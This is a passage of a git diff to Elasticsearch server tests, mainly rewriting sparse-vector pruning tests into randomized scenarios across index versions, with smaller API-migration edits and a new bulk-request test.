SortedSetDocValues dv; private int seen = 0; diff --git a/server/src/test/java/org/elasticsearch/index/mapper/vectors/DenseVectorFieldMapperTests.java b/server/src/test/java/org/elasticsearch/index/mapper/vectors/DenseVectorFieldMapperTests.java index 8f17dfa8fd56e..b9dcb88189bec 100644 --- a/server/src/test/java/org/elasticsearch/index/mapper/vectors/DenseVectorFieldMapperTests.java +++ b/server/src/test/java/org/elasticsearch/index/mapper/vectors/DenseVectorFieldMapperTests.java @@ -68,6 +68,7 @@ import static org.apache.lucene.tests.index.BaseKnnVectorsFormatTestCase.randomNormalizedVector; import static org.elasticsearch.index.codec.vectors.IVFVectorsFormat.DYNAMIC_NPROBE; import static org.elasticsearch.index.mapper.vectors.DenseVectorFieldMapper.DEFAULT_OVERSAMPLE; +import static org.elasticsearch.index.mapper.vectors.DenseVectorFieldMapper.INDEXED_BY_DEFAULT_INDEX_VERSION; import static org.elasticsearch.index.mapper.vectors.DenseVectorFieldMapper.IVF_FORMAT; import static org.hamcrest.Matchers.containsString; import static org.hamcrest.Matchers.equalTo; @@ -107,7 +108,7 @@ private void indexMapping(XContentBuilder b, IndexVersion indexVersion) throws I if (elementType != ElementType.FLOAT) { b.field("element_type", elementType.toString()); } - if (indexVersion.onOrAfter(DenseVectorFieldMapper.INDEXED_BY_DEFAULT_INDEX_VERSION) || indexed) { + if (indexVersion.onOrAfter(INDEXED_BY_DEFAULT_INDEX_VERSION) || indexed) { // Serialize if it's new index version, or it was not the default for previous indices b.field("index", indexed); } diff --git a/server/src/test/java/org/elasticsearch/index/mapper/vectors/SparseVectorFieldMapperTests.java b/server/src/test/java/org/elasticsearch/index/mapper/vectors/SparseVectorFieldMapperTests.java 
index 3ceab2cf204c7..9c451dde85fd3 100644 --- a/server/src/test/java/org/elasticsearch/index/mapper/vectors/SparseVectorFieldMapperTests.java +++ b/server/src/test/java/org/elasticsearch/index/mapper/vectors/SparseVectorFieldMapperTests.java @@ -16,6 +16,7 @@ import org.apache.lucene.index.LeafReader; import org.apache.lucene.search.BooleanClause; import org.apache.lucene.search.BooleanQuery; +import org.apache.lucene.search.BoostQuery; import org.apache.lucene.search.IndexSearcher; import org.apache.lucene.search.Query; import org.apache.lucene.store.Directory; @@ -38,6 +39,7 @@ import org.elasticsearch.inference.WeightedToken; import org.elasticsearch.search.lookup.Source; import org.elasticsearch.search.vectors.SparseVectorQueryWrapper; +import org.elasticsearch.test.ESTestCase; import org.elasticsearch.test.index.IndexVersionUtils; import org.elasticsearch.xcontent.ToXContent; import org.elasticsearch.xcontent.XContentBuilder; @@ -53,12 +55,17 @@ import java.util.LinkedHashMap; import java.util.List; import java.util.Map; +import java.util.NavigableSet; +import java.util.Set; +import java.util.TreeMap; +import java.util.stream.Collectors; +import java.util.stream.Stream; +import static org.elasticsearch.index.IndexVersions.NEW_SPARSE_VECTOR; import static org.elasticsearch.index.IndexVersions.SPARSE_VECTOR_PRUNING_INDEX_OPTIONS_SUPPORT; +import static org.elasticsearch.index.IndexVersions.SPARSE_VECTOR_PRUNING_INDEX_OPTIONS_SUPPORT_BACKPORT_8_X; import static org.elasticsearch.index.IndexVersions.UPGRADE_TO_LUCENE_10_0_0; -import static org.elasticsearch.index.mapper.vectors.SparseVectorFieldMapper.NEW_SPARSE_VECTOR_INDEX_VERSION; -import static org.elasticsearch.index.mapper.vectors.SparseVectorFieldMapper.PREVIOUS_SPARSE_VECTOR_INDEX_VERSION; -import static org.elasticsearch.index.mapper.vectors.SparseVectorFieldMapper.SPARSE_VECTOR_PRUNING_INDEX_OPTIONS_VERSION; +import static org.elasticsearch.index.IndexVersions.V_8_0_0; import static org.elasticsearch.test.hamcrest.ElasticsearchAssertions.assertToXContentEquivalent; import static org.elasticsearch.xcontent.XContentFactory.jsonBuilder; import static org.hamcrest.Matchers.containsString; @@ -67,6 +74,22 @@ public class SparseVectorFieldMapperTests extends MapperTestCase { + public static final float STRICT_TOKENS_WEIGHT_THRESHOLD = 0.5f; + public static final float STRICT_TOKENS_FREQ_RATIO_THRESHOLD = 1; + + private static final Map COMMON_TOKENS = Map.of( + "common1_drop_default", + 0.1f, + "common2_drop_default", + 0.1f, + "common3_drop_default", + 0.1f + ); + + private static final Map MEDIUM_TOKENS = Map.of("medium1_keep_strict", 0.5f, "medium2_keep_default", 0.25f); + + private static final Map RARE_TOKENS = Map.of("rare1_keep_strict", 0.9f, "rare2_keep_strict", 0.85f); + @Override protected Object getSampleValueForDocument() { Map map = new LinkedHashMap<>(); @@ -122,7 +145,7 @@ protected void minimalMappingWithExplicitIndexOptions(XContentBuilder b) throws b.field("prune", true); b.startObject("pruning_config"); { - b.field("tokens_freq_ratio_threshold", 3.0f); + b.field("tokens_freq_ratio_threshold", 1.0f); b.field("tokens_weight_threshold", 0.5f); } b.endObject(); @@ -177,6 +200,13 @@ protected void mappingWithIndexOptionsPruneFalse(XContentBuilder b) throws IOExc b.endObject(); } + private void mapping(XContentBuilder b, @Nullable Boolean prune, PruningConfig pruningConfig) throws IOException { + b.field("type", "sparse_vector"); + if (prune != null) { + b.field("index_options", new 
SparseVectorFieldMapper.IndexOptions(prune, pruningConfig.tokenPruningConfig)); + } + } + @Override protected boolean supportsStoredFields() { return false; @@ -262,7 +292,7 @@ public void testDefaultsWithAndWithoutIncludeDefaultsOlderIndexVersion() throws IndexVersion indexVersion = IndexVersionUtils.randomVersionBetween( random(), UPGRADE_TO_LUCENE_10_0_0, - IndexVersionUtils.getPreviousVersion(SPARSE_VECTOR_PRUNING_INDEX_OPTIONS_VERSION) + IndexVersionUtils.getPreviousVersion(SPARSE_VECTOR_PRUNING_INDEX_OPTIONS_SUPPORT) ); XContentBuilder orig = JsonXContent.contentBuilder().startObject(); @@ -483,7 +513,7 @@ protected IngestScriptSupport ingestScriptSupport() { @Override protected String[] getParseMinimalWarnings(IndexVersion indexVersion) { String[] additionalWarnings = null; - if (indexVersion.before(PREVIOUS_SPARSE_VECTOR_INDEX_VERSION)) { + if (indexVersion.before(V_8_0_0)) { additionalWarnings = new String[] { SparseVectorFieldMapper.ERROR_MESSAGE_7X }; } return Strings.concatStringArrays(super.getParseMinimalWarnings(indexVersion), additionalWarnings); @@ -491,15 +521,11 @@ protected String[] getParseMinimalWarnings(IndexVersion indexVersion) { @Override protected IndexVersion boostNotAllowedIndexVersion() { - return NEW_SPARSE_VECTOR_INDEX_VERSION; + return NEW_SPARSE_VECTOR; } public void testSparseVectorUnsupportedIndex() { - IndexVersion version = IndexVersionUtils.randomVersionBetween( - random(), - PREVIOUS_SPARSE_VECTOR_INDEX_VERSION, - IndexVersions.FIRST_DETACHED_INDEX_VERSION - ); + IndexVersion version = IndexVersionUtils.randomVersionBetween(random(), V_8_0_0, IndexVersions.FIRST_DETACHED_INDEX_VERSION); Exception e = expectThrows(MapperParsingException.class, () -> createMapperService(version, fieldMapping(b -> { b.field("type", "sparse_vector"); }))); @@ -678,14 +704,60 @@ public void testTokensWeightThresholdCorrect() { ); } + private enum PruningScenario { + NO_PRUNING, // No pruning applied - all tokens preserved + DEFAULT_PRUNING, // Default pruning configuration + STRICT_PRUNING // Stricter pruning with higher thresholds + } + + private enum PruningConfig { + NULL(null), + EXPLICIT_DEFAULT(new TokenPruningConfig()), + STRICT(new TokenPruningConfig(STRICT_TOKENS_FREQ_RATIO_THRESHOLD, STRICT_TOKENS_WEIGHT_THRESHOLD, false)); + + public final @Nullable TokenPruningConfig tokenPruningConfig; + + PruningConfig(@Nullable TokenPruningConfig tokenPruningConfig) { + this.tokenPruningConfig = tokenPruningConfig; + } + } + + private final Set validIndexPruningScenarios = Set.of( + new PruningOptions(false, PruningConfig.NULL), + new PruningOptions(true, PruningConfig.NULL), + new PruningOptions(true, PruningConfig.EXPLICIT_DEFAULT), + new PruningOptions(true, PruningConfig.STRICT), + new PruningOptions(null, PruningConfig.NULL) + ); + + private record PruningOptions(@Nullable Boolean prune, PruningConfig pruningConfig) {} + private void withSearchExecutionContext(MapperService mapperService, CheckedConsumer consumer) throws IOException { var mapper = mapperService.documentMapper(); try (Directory directory = newDirectory()) { RandomIndexWriter iw = new RandomIndexWriter(random(), directory); - var sourceToParse = source(this::writeField); - ParsedDocument doc1 = mapper.parse(sourceToParse); - iw.addDocument(doc1.rootDoc()); + + int commonDocs = 20; + for (int i = 0; i < commonDocs; i++) { + iw.addDocument(mapper.parse(source(b -> b.field("field", COMMON_TOKENS))).rootDoc()); + } + + int mediumDocs = 5; + for (int i = 0; i < mediumDocs; i++) { + 
iw.addDocument(mapper.parse(source(b -> b.field("field", MEDIUM_TOKENS))).rootDoc()); + } + + iw.addDocument(mapper.parse(source(b -> b.field("field", RARE_TOKENS))).rootDoc()); + + // This will lower the averageTokenFreqRatio so that common tokens get pruned with default settings. + // Depending on how the index is created, we will have 30-37 numUniqueTokens + // this will result in an averageTokenFreqRatio of 0.1021 - 0.1259 + Map uniqueDoc = new TreeMap<>(); + for (int i = 0; i < 30; i++) { + uniqueDoc.put("unique" + i, 0.5f); + } + iw.addDocument(mapper.parse(source(b -> b.field("field", uniqueDoc))).rootDoc()); iw.close(); try (DirectoryReader reader = wrapInMockESDirectoryReader(DirectoryReader.open(directory))) { @@ -695,203 +767,139 @@ private void withSearchExecutionContext(MapperService mapperService, CheckedCons } } - public void testTypeQueryFinalizationWithRandomOptions() throws Exception { - for (int i = 0; i < 20; i++) { - runTestTypeQueryFinalization( - randomBoolean(), // useIndexVersionBeforeIndexOptions - randomBoolean(), // useMapperDefaultIndexOptions - randomBoolean(), // setMapperIndexOptionsPruneToFalse - randomBoolean(), // queryOverridesPruningConfig - randomBoolean() // queryOverridesPruneToBeFalse + public void testPruningScenarios() throws Exception { + for (int i = 0; i < 200; i++) { + assertPruningScenario( + randomFrom(validIndexPruningScenarios), + new PruningOptions(randomFrom(true, false, null), randomFrom(PruningConfig.values())) ); } } - public void testTypeQueryFinalizationDefaultsCurrentVersion() throws Exception { - IndexVersion version = IndexVersion.current(); - MapperService mapperService = createMapperService(version, fieldMapping(this::minimalMapping)); - - // query should be pruned by default on newer index versions - performTypeQueryFinalizationTest(mapperService, null, null, true); + private XContentBuilder getIndexMapping(PruningOptions pruningOptions) throws IOException { + return fieldMapping(b -> mapping(b, pruningOptions.prune, pruningOptions.pruningConfig)); } - public void testTypeQueryFinalizationDefaultsPreviousVersion() throws Exception { - IndexVersion version = IndexVersionUtils.randomVersionBetween( - random(), - UPGRADE_TO_LUCENE_10_0_0, - IndexVersionUtils.getPreviousVersion(SPARSE_VECTOR_PRUNING_INDEX_OPTIONS_SUPPORT) - ); - MapperService mapperService = createMapperService(version, fieldMapping(this::minimalMapping)); - - // query should _not_ be pruned by default on older index versions - performTypeQueryFinalizationTest(mapperService, null, null, false); - } - - public void testTypeQueryFinalizationWithIndexExplicit() throws Exception { - IndexVersion version = IndexVersion.current(); - MapperService mapperService = createMapperService(version, fieldMapping(this::minimalMapping)); + private void assertQueryContains(List expectedClauses, Query query) { + SparseVectorQueryWrapper queryWrapper = (SparseVectorQueryWrapper) query; + var termsQuery = queryWrapper.getTermsQuery(); + assertNotNull(termsQuery); + var booleanQuery = (BooleanQuery) termsQuery; - // query should be pruned via explicit index options - performTypeQueryFinalizationTest(mapperService, null, null, true); + Collection shouldClauses = booleanQuery.getClauses(BooleanClause.Occur.SHOULD); + assertThat(shouldClauses, Matchers.containsInAnyOrder(expectedClauses.toArray())); } - public void testTypeQueryFinalizationWithIndexExplicitDoNotPrune() throws Exception { - IndexVersion version = IndexVersion.current(); - MapperService mapperService = 
createMapperService(version, fieldMapping(this::mappingWithIndexOptionsPruneFalse)); + private PruningScenario getEffectivePruningScenario( + PruningOptions indexPruningOptions, + PruningOptions queryPruningOptions, + IndexVersion indexVersion + ) { + Boolean shouldPrune = queryPruningOptions.prune; + if (shouldPrune == null) { + shouldPrune = indexPruningOptions.prune; + } - // query should be pruned via explicit index options - performTypeQueryFinalizationTest(mapperService, null, null, false); - } + if (shouldPrune == null) { + shouldPrune = indexVersion.between(SPARSE_VECTOR_PRUNING_INDEX_OPTIONS_SUPPORT_BACKPORT_8_X, UPGRADE_TO_LUCENE_10_0_0) + || indexVersion.onOrAfter(SPARSE_VECTOR_PRUNING_INDEX_OPTIONS_SUPPORT); + } - public void testTypeQueryFinalizationQueryOverridesPruning() throws Exception { - IndexVersion version = IndexVersion.current(); - MapperService mapperService = createMapperService(version, fieldMapping(this::mappingWithIndexOptionsPruneFalse)); + PruningScenario pruningScenario = PruningScenario.NO_PRUNING; + if (shouldPrune) { + PruningConfig pruningConfig = queryPruningOptions.pruningConfig; + if (pruningConfig == PruningConfig.NULL) { + pruningConfig = indexPruningOptions.pruningConfig; + } + pruningScenario = switch (pruningConfig) { + case STRICT -> PruningScenario.STRICT_PRUNING; + case EXPLICIT_DEFAULT, NULL -> PruningScenario.DEFAULT_PRUNING; + }; + } - // query should still be pruned due to query builder setting it - performTypeQueryFinalizationTest(mapperService, true, new TokenPruningConfig(), true); + return pruningScenario; } - public void testTypeQueryFinalizationQueryOverridesPruningOff() throws Exception { - IndexVersion version = IndexVersion.current(); - MapperService mapperService = createMapperService(version, fieldMapping(this::mappingWithIndexOptionsPruneFalse)); + private List getExpectedQueryClauses( + SparseVectorFieldMapper.SparseVectorFieldType ft, + PruningScenario pruningScenario, + SearchExecutionContext searchExecutionContext + ) { + List tokens = switch (pruningScenario) { + case NO_PRUNING -> QUERY_VECTORS; + case DEFAULT_PRUNING -> QUERY_VECTORS.stream() + .filter(t -> t.token().startsWith("rare") || t.token().startsWith("medium")) + .toList(); + case STRICT_PRUNING -> QUERY_VECTORS.stream().filter(t -> t.token().endsWith("keep_strict")).toList(); + }; - // query should not pruned due to query builder setting it - performTypeQueryFinalizationTest(mapperService, false, null, false); + return tokens.stream().map(t -> { + Query termQuery = ft.termQuery(t.token(), searchExecutionContext); + return new BoostQuery(termQuery, t.weight()); + }).collect(Collectors.toUnmodifiableList()); } - private void performTypeQueryFinalizationTest( - MapperService mapperService, - @Nullable Boolean queryPrune, - @Nullable TokenPruningConfig queryTokenPruningConfig, - boolean queryShouldBePruned - ) throws IOException { + private void assertPruningScenario(PruningOptions indexPruningOptions, PruningOptions queryPruningOptions) throws IOException { + IndexVersion indexVersion = getIndexVersion(); + MapperService mapperService = createMapperService(indexVersion, getIndexMapping(indexPruningOptions)); + PruningScenario effectivePruningScenario = getEffectivePruningScenario(indexPruningOptions, queryPruningOptions, indexVersion); withSearchExecutionContext(mapperService, (context) -> { SparseVectorFieldMapper.SparseVectorFieldType ft = (SparseVectorFieldMapper.SparseVectorFieldType) mapperService.fieldType( "field" ); - Query finalizedQuery = 
ft.finalizeSparseVectorQuery(context, "field", QUERY_VECTORS, queryPrune, queryTokenPruningConfig); - - if (queryShouldBePruned) { - assertQueryWasPruned(finalizedQuery); - } else { - assertQueryWasNotPruned(finalizedQuery); - } + List expectedQueryClauses = getExpectedQueryClauses(ft, effectivePruningScenario, context); + Query finalizedQuery = ft.finalizeSparseVectorQuery( + context, + "field", + QUERY_VECTORS, + queryPruningOptions.prune, + queryPruningOptions.pruningConfig.tokenPruningConfig + ); + assertQueryContains(expectedQueryClauses, finalizedQuery); }); } - private void assertQueryWasPruned(Query query) { - assertQueryHasClauseCount(query, 0); + private static IndexVersion getIndexVersion() { + VersionRange versionRange = randomFrom(VersionRange.values()); + return versionRange.getRandomVersion(); } - private void assertQueryWasNotPruned(Query query) { - assertQueryHasClauseCount(query, QUERY_VECTORS.size()); - } - - private void assertQueryHasClauseCount(Query query, int clauseCount) { - SparseVectorQueryWrapper queryWrapper = (SparseVectorQueryWrapper) query; - var termsQuery = queryWrapper.getTermsQuery(); - assertNotNull(termsQuery); - var booleanQuery = (BooleanQuery) termsQuery; - Collection clauses = booleanQuery.getClauses(BooleanClause.Occur.SHOULD); - assertThat(clauses.size(), equalTo(clauseCount)); - } - - /** - * Runs a test of the query finalization based on various parameters - * that provides - * @param useIndexVersionBeforeIndexOptions set to true to use a previous index version before mapper index_options - * @param useMapperDefaultIndexOptions set to false to use an explicit, non-default mapper index_options - * @param setMapperIndexOptionsPruneToFalse set to true to use prune:false in the mapper index_options - * @param queryOverridesPruningConfig set to true to designate the query will provide a pruning_config - * @param queryOverridesPruneToBeFalse if true and queryOverridesPruningConfig is true, the query will provide prune:false - * @throws IOException - */ - private void runTestTypeQueryFinalization( - boolean useIndexVersionBeforeIndexOptions, - boolean useMapperDefaultIndexOptions, - boolean setMapperIndexOptionsPruneToFalse, - boolean queryOverridesPruningConfig, - boolean queryOverridesPruneToBeFalse - ) throws IOException { - MapperService mapperService = getMapperServiceForTest( - useIndexVersionBeforeIndexOptions, - useMapperDefaultIndexOptions, - setMapperIndexOptionsPruneToFalse - ); + private enum VersionRange { + ES_V8X_WITHOUT_INDEX_OPTIONS_SUPPORT( + NEW_SPARSE_VECTOR, + IndexVersionUtils.getPreviousVersion(SPARSE_VECTOR_PRUNING_INDEX_OPTIONS_SUPPORT_BACKPORT_8_X) + ), + ES_V8X_WITH_INDEX_OPTIONS_SUPPORT( + SPARSE_VECTOR_PRUNING_INDEX_OPTIONS_SUPPORT_BACKPORT_8_X, + IndexVersionUtils.getPreviousVersion(UPGRADE_TO_LUCENE_10_0_0) + ), + ES_V9X_WITHOUT_INDEX_OPTIONS_SUPPORT( + UPGRADE_TO_LUCENE_10_0_0, + IndexVersionUtils.getPreviousVersion(SPARSE_VECTOR_PRUNING_INDEX_OPTIONS_SUPPORT) + ), + ES_V9X_WITH_INDEX_OPTIONS_SUPPORT(SPARSE_VECTOR_PRUNING_INDEX_OPTIONS_SUPPORT, IndexVersion.current()); - // check and see if the query should explicitly override the index_options - Boolean shouldQueryPrune = queryOverridesPruningConfig ? (queryOverridesPruneToBeFalse == false) : null; - - // get the pruning configuration for the query if it's overriding - TokenPruningConfig queryPruningConfig = Boolean.TRUE.equals(shouldQueryPrune) ? 
new TokenPruningConfig() : null; - - // our logic if the results should be pruned or not - // we should _not_ prune if any of the following: - // - the query explicitly overrides the options and `prune` is set to false - // - the query does not override the pruning options and: - // - either we are using a previous index version - // - or the index_options explicitly sets `prune` to false - boolean resultShouldNotBePruned = ((queryOverridesPruningConfig && queryOverridesPruneToBeFalse) - || (queryOverridesPruningConfig == false && (useIndexVersionBeforeIndexOptions || setMapperIndexOptionsPruneToFalse))); - - try { - performTypeQueryFinalizationTest(mapperService, shouldQueryPrune, queryPruningConfig, resultShouldNotBePruned == false); - } catch (AssertionError e) { - String message = "performTypeQueryFinalizationTest failed using parameters: " - + "useIndexVersionBeforeIndexOptions: " - + useIndexVersionBeforeIndexOptions - + ", useMapperDefaultIndexOptions: " - + useMapperDefaultIndexOptions - + ", setMapperIndexOptionsPruneToFalse: " - + setMapperIndexOptionsPruneToFalse - + ", queryOverridesPruningConfig: " - + queryOverridesPruningConfig - + ", queryOverridesPruneToBeFalse: " - + queryOverridesPruneToBeFalse; - throw new AssertionError(message, e); - } - } + private final IndexVersion fromVersion; + private final IndexVersion toVersion; - private IndexVersion getIndexVersionForTest(boolean usePreviousIndex) { - return usePreviousIndex - ? IndexVersionUtils.randomVersionBetween( - random(), - UPGRADE_TO_LUCENE_10_0_0, - IndexVersionUtils.getPreviousVersion(SPARSE_VECTOR_PRUNING_INDEX_OPTIONS_SUPPORT) - ) - : IndexVersionUtils.randomVersionBetween(random(), SPARSE_VECTOR_PRUNING_INDEX_OPTIONS_SUPPORT, IndexVersion.current()); - } - - private MapperService getMapperServiceForTest( - boolean usePreviousIndex, - boolean useIndexOptionsDefaults, - boolean explicitIndexOptionsDoNotPrune - ) throws IOException { - // get the index version of the test to use - // either a current version that supports index options, or a previous version that does not - IndexVersion indexVersion = getIndexVersionForTest(usePreviousIndex); - - // if it's using the old index, we always use the minimal mapping without index_options - if (usePreviousIndex) { - return createMapperService(indexVersion, fieldMapping(this::minimalMapping)); + VersionRange(IndexVersion fromVersion, IndexVersion toVersion) { + this.fromVersion = fromVersion; + this.toVersion = toVersion; } - // if we set explicitIndexOptionsDoNotPrune, the index_options (if present) will explicitly include "prune: false" - if (explicitIndexOptionsDoNotPrune) { - return createMapperService(indexVersion, fieldMapping(this::mappingWithIndexOptionsPruneFalse)); + IndexVersion getRandomVersion() { + // TODO: replace implementation with `IndexVersionUtils::randomVersionBetween` once support is added + // for handling unbalanced version distributions. + NavigableSet allReleaseVersions = IndexVersionUtils.allReleasedVersions(); + Set candidateVersions = allReleaseVersions.subSet(fromVersion, toVersion); + return ESTestCase.randomFrom(candidateVersions); } - - // either return the default (minimal) mapping or one with an explicit pruning_config - return useIndexOptionsDefaults - ? 
createMapperService(indexVersion, fieldMapping(this::minimalMapping)) - : createMapperService(indexVersion, fieldMapping(this::minimalMappingWithExplicitIndexOptions)); } - private static List QUERY_VECTORS = List.of( - new WeightedToken("pugs", 0.5f), - new WeightedToken("cats", 0.4f), - new WeightedToken("is", 0.1f) - ); + private static final List QUERY_VECTORS = Stream.of(RARE_TOKENS, MEDIUM_TOKENS, COMMON_TOKENS) + .flatMap(map -> map.entrySet().stream()) + .map(entry -> new WeightedToken(entry.getKey(), entry.getValue())) + .collect(Collectors.toList()); /** * Handles float/double conversion when reading/writing with xcontent by converting all numbers to floats. diff --git a/server/src/test/java/org/elasticsearch/index/query/SpanMultiTermQueryBuilderTests.java b/server/src/test/java/org/elasticsearch/index/query/SpanMultiTermQueryBuilderTests.java index 283bbbc9b100d..553a3b9811e3f 100644 --- a/server/src/test/java/org/elasticsearch/index/query/SpanMultiTermQueryBuilderTests.java +++ b/server/src/test/java/org/elasticsearch/index/query/SpanMultiTermQueryBuilderTests.java @@ -28,7 +28,6 @@ import org.apache.lucene.store.Directory; import org.apache.lucene.tests.index.RandomIndexWriter; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.Strings; import org.elasticsearch.common.compress.CompressedXContent; import org.elasticsearch.common.io.stream.StreamOutput; @@ -168,7 +167,7 @@ public String fieldName() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/test/java/org/elasticsearch/index/query/WildcardQueryBuilderTests.java b/server/src/test/java/org/elasticsearch/index/query/WildcardQueryBuilderTests.java index 182bd4d6b5b86..13812ec341f23 100644 --- a/server/src/test/java/org/elasticsearch/index/query/WildcardQueryBuilderTests.java +++ b/server/src/test/java/org/elasticsearch/index/query/WildcardQueryBuilderTests.java @@ -114,6 +114,7 @@ public void testFromJson() throws IOException { checkGeneratedJson(json, parsed); assertEquals(json, "ki*y", parsed.value()); assertEquals(json, 2.0, parsed.boost(), 0.0001); + assertEquals(new WildcardQueryBuilder("user", "ki*y", false).caseInsensitive(true).boost(2.0f), parsed); } public void testParseFailsWithMultipleFields() throws IOException { diff --git a/server/src/test/java/org/elasticsearch/index/shard/RemoveCorruptedShardDataCommandTests.java b/server/src/test/java/org/elasticsearch/index/shard/RemoveCorruptedShardDataCommandTests.java index 58743213566bf..f87a6c46f82f6 100644 --- a/server/src/test/java/org/elasticsearch/index/shard/RemoveCorruptedShardDataCommandTests.java +++ b/server/src/test/java/org/elasticsearch/index/shard/RemoveCorruptedShardDataCommandTests.java @@ -54,6 +54,7 @@ import org.elasticsearch.test.CorruptionUtils; import org.elasticsearch.test.DummyShardLock; import org.elasticsearch.test.ESTestCase; +import org.elasticsearch.test.ESTestCase.WithoutEntitlements; import org.junit.Before; import java.io.IOException; @@ -77,6 +78,7 @@ import static org.hamcrest.Matchers.is; import static org.hamcrest.Matchers.startsWith; +@WithoutEntitlements // commands don't run with entitlements enforced public class RemoveCorruptedShardDataCommandTests extends IndexShardTestCase { private ShardId shardId; diff --git a/server/src/test/java/org/elasticsearch/index/translog/TranslogTests.java 
b/server/src/test/java/org/elasticsearch/index/translog/TranslogTests.java index 74e68c39e78fa..8032eda2dba1a 100644 --- a/server/src/test/java/org/elasticsearch/index/translog/TranslogTests.java +++ b/server/src/test/java/org/elasticsearch/index/translog/TranslogTests.java @@ -27,7 +27,6 @@ import org.apache.lucene.tests.util.LuceneTestCase; import org.apache.lucene.util.BytesRef; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.cluster.metadata.IndexMetadata; import org.elasticsearch.common.Randomness; import org.elasticsearch.common.Strings; @@ -3465,7 +3464,7 @@ public void testTranslogOpSerialization() throws Exception { TransportVersion wireVersion = TransportVersionUtils.randomVersionBetween( random(), - TransportVersions.MINIMUM_COMPATIBLE, + TransportVersion.minimumCompatible(), TransportVersion.current() ); BytesStreamOutput out = new BytesStreamOutput(); diff --git a/server/src/test/java/org/elasticsearch/indices/IndicesServiceCloseTests.java b/server/src/test/java/org/elasticsearch/indices/IndicesServiceCloseTests.java index a48ba63882734..78df6c9e88c65 100644 --- a/server/src/test/java/org/elasticsearch/indices/IndicesServiceCloseTests.java +++ b/server/src/test/java/org/elasticsearch/indices/IndicesServiceCloseTests.java @@ -77,7 +77,8 @@ private Node startNode() throws NodeValidationException { Node node = new MockNode( settings, Arrays.asList(getTestTransportPlugin(), MockHttpTransport.TestPlugin.class, InternalSettingsPlugin.class), - true + true, + () -> {} ); node.start(); return node; diff --git a/server/src/test/java/org/elasticsearch/indices/cluster/ClusterStateChanges.java b/server/src/test/java/org/elasticsearch/indices/cluster/ClusterStateChanges.java index 19eb662dd0c05..c9673e1285ffd 100644 --- a/server/src/test/java/org/elasticsearch/indices/cluster/ClusterStateChanges.java +++ b/server/src/test/java/org/elasticsearch/indices/cluster/ClusterStateChanges.java @@ -103,7 +103,6 @@ import org.elasticsearch.indices.TestIndexNameExpressionResolver; import org.elasticsearch.snapshots.EmptySnapshotsInfoService; import org.elasticsearch.tasks.TaskManager; -import org.elasticsearch.telemetry.tracing.Tracer; import org.elasticsearch.test.ClusterServiceUtils; import org.elasticsearch.test.gateway.TestGatewayAllocator; import org.elasticsearch.threadpool.ThreadPool; @@ -234,8 +233,7 @@ protected ExecutorService createThreadPoolExecutor() { .address(boundAddress.publishAddress()) .build(), clusterSettings, - Collections.emptySet(), - Tracer.NOOP + Collections.emptySet() ) { @Override public Transport.Connection getConnection(DiscoveryNode node) { diff --git a/server/src/test/java/org/elasticsearch/rest/action/document/RestBulkActionTests.java b/server/src/test/java/org/elasticsearch/rest/action/document/RestBulkActionTests.java index f4d601c7ad3b4..0b3e50974a827 100644 --- a/server/src/test/java/org/elasticsearch/rest/action/document/RestBulkActionTests.java +++ b/server/src/test/java/org/elasticsearch/rest/action/document/RestBulkActionTests.java @@ -10,6 +10,7 @@ package org.elasticsearch.rest.action.document; import org.apache.lucene.util.SetOnce; +import org.elasticsearch.ElasticsearchParseException; import org.elasticsearch.action.ActionListener; import org.elasticsearch.action.DocWriteRequest; import org.elasticsearch.action.bulk.BulkRequest; @@ -18,12 +19,12 @@ import org.elasticsearch.action.index.IndexRequest; import org.elasticsearch.action.update.UpdateRequest; import 
org.elasticsearch.client.internal.Client; +import org.elasticsearch.client.internal.node.NodeClient; import org.elasticsearch.common.bytes.BytesArray; import org.elasticsearch.common.bytes.ReleasableBytesReference; import org.elasticsearch.common.settings.ClusterSettings; import org.elasticsearch.common.settings.Settings; import org.elasticsearch.core.Releasable; -import org.elasticsearch.http.HttpBody; import org.elasticsearch.index.IndexVersion; import org.elasticsearch.index.IndexingPressure; import org.elasticsearch.rest.RestChannel; @@ -31,6 +32,7 @@ import org.elasticsearch.telemetry.metric.MeterRegistry; import org.elasticsearch.test.ESTestCase; import org.elasticsearch.test.client.NoOpNodeClient; +import org.elasticsearch.test.rest.FakeHttpBodyStream; import org.elasticsearch.test.rest.FakeRestChannel; import org.elasticsearch.test.rest.FakeRestRequest; import org.elasticsearch.xcontent.XContentType; @@ -201,6 +203,24 @@ public void bulk(BulkRequest request, ActionListener listener) { } } + public void testIncrementalBulkMissingContent() { + assertThrows( + ElasticsearchParseException.class, + () -> new RestBulkAction( + Settings.EMPTY, + ClusterSettings.createBuiltInClusterSettings(), + new IncrementalBulkService(mock(Client.class), mock(IndexingPressure.class), MeterRegistry.NOOP) + ).handleRequest( + new FakeRestRequest.Builder(xContentRegistry()).withPath("my_index/_bulk") + .withContentLength(0) + .withBody(new FakeHttpBodyStream()) + .build(), + mock(RestChannel.class), + mock(NodeClient.class) + ) + ); + } + public void testIncrementalParsing() { ArrayList> docs = new ArrayList<>(); AtomicBoolean isLast = new AtomicBoolean(false); @@ -208,21 +228,7 @@ public void testIncrementalParsing() { FakeRestRequest request = new FakeRestRequest.Builder(xContentRegistry()).withPath("my_index/_bulk") .withMethod(RestRequest.Method.POST) - .withBody(new HttpBody.Stream() { - @Override - public void close() {} - - @Override - public ChunkHandler handler() { - return null; - } - - @Override - public void addTracingHandler(ChunkHandler chunkHandler) {} - - @Override - public void setHandler(ChunkHandler chunkHandler) {} - + .withBody(new FakeHttpBodyStream() { @Override public void next() { next.set(true); diff --git a/server/src/test/java/org/elasticsearch/search/SearchModuleTests.java b/server/src/test/java/org/elasticsearch/search/SearchModuleTests.java index 1e638f8e7b30e..5c55b05bb2c70 100644 --- a/server/src/test/java/org/elasticsearch/search/SearchModuleTests.java +++ b/server/src/test/java/org/elasticsearch/search/SearchModuleTests.java @@ -9,7 +9,6 @@ package org.elasticsearch.search; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.CheckedBiConsumer; import org.elasticsearch.common.io.stream.GenericNamedWriteable; import org.elasticsearch.common.io.stream.StreamInput; @@ -527,7 +526,7 @@ private static TestAggregationBuilder fromXContent(String name, XContentParser p @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } @@ -580,7 +579,7 @@ protected void validate(ValidationContext context) {} @Override public TransportVersion 